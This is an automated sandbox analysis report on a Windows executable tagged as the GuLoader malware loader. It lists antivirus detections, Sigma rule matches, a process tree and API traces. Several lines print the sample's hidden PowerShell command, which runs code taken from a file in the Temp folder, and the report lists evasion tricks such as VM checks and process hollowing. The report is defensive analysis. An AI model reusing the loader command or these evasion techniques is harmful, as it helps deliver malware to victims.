Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MPkM9Dd99B.exe

Overview

General Information

Sample name:MPkM9Dd99B.exe
renamed because original name is a hash value
Original sample name:8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0.exe
Analysis ID:1589010
MD5:2afc878d1fcfb41b15beafb1faab9edb
SHA1:97cf12f3fd3d4e6fa6010d05fdfa8e7d3cbeba55
SHA256:8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • MPkM9Dd99B.exe (PID: 3352 cmdline: "C:\Users\user\Desktop\MPkM9Dd99B.exe" MD5: 2AFC878D1FCFB41B15BEAFB1FAAB9EDB)
    • powershell.exe (PID: 2952 cmdline: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SIHClient.exe (PID: 3776 cmdline: C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
      • msiexec.exe (PID: 3500 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6716 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5320 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6464 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2216 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4536 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4280 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5700 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7024 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 6960 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2844 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6408 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2452 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3884 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6036 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4788 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4940 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4808 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 5040 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3848 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3796 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2772 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3324 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2976 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1868 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6736 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5064 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5464 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3832 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2508 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1848 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2512 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MPkM9Dd99B.exe", ParentImage: C:\Users\user\Desktop\MPkM9Dd99B.exe, ParentProcessId: 3352, ParentProcessName: MPkM9Dd99B.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", ProcessId: 2952, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MPkM9Dd99B.exe", ParentImage: C:\Users\user\Desktop\MPkM9Dd99B.exe, ParentProcessId: 3352, ParentProcessName: MPkM9Dd99B.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) ", ProcessId: 2952, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: MPkM9Dd99B.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: MPkM9Dd99B.exeVirustotal: Detection: 65%Perma Link
Source: MPkM9Dd99B.exeReversingLabs: Detection: 69%
Source: MPkM9Dd99B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: MPkM9Dd99B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: MPkM9Dd99B.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MPkM9Dd99B.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040550F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeFile created: C:\Windows\resources\0809Jump to behavior
Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP4BCB.tmp
Source: C:\Windows\System32\SIHClient.exeFile created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPE03C.tmp
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004072D10_2_004072D1
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_00406AFA0_2_00406AFA
Source: MPkM9Dd99B.exeStatic PE information: invalid certificate
Source: MPkM9Dd99B.exe, 00000000.00000000.1438338186.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs MPkM9Dd99B.exe
Source: MPkM9Dd99B.exeBinary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs MPkM9Dd99B.exe
Source: MPkM9Dd99B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal76.evad.winEXE@4491/22@0/0
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004047BF
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\SIHClient.exeMutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeFile created: C:\Users\user\AppData\Local\Temp\nss902C.tmpJump to behavior
Source: MPkM9Dd99B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: MPkM9Dd99B.exeVirustotal: Detection: 65%
Source: MPkM9Dd99B.exeReversingLabs: Detection: 69%
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeFile read: C:\Users\user\Desktop\MPkM9Dd99B.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\MPkM9Dd99B.exe "C:\Users\user\Desktop\MPkM9Dd99B.exe"
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
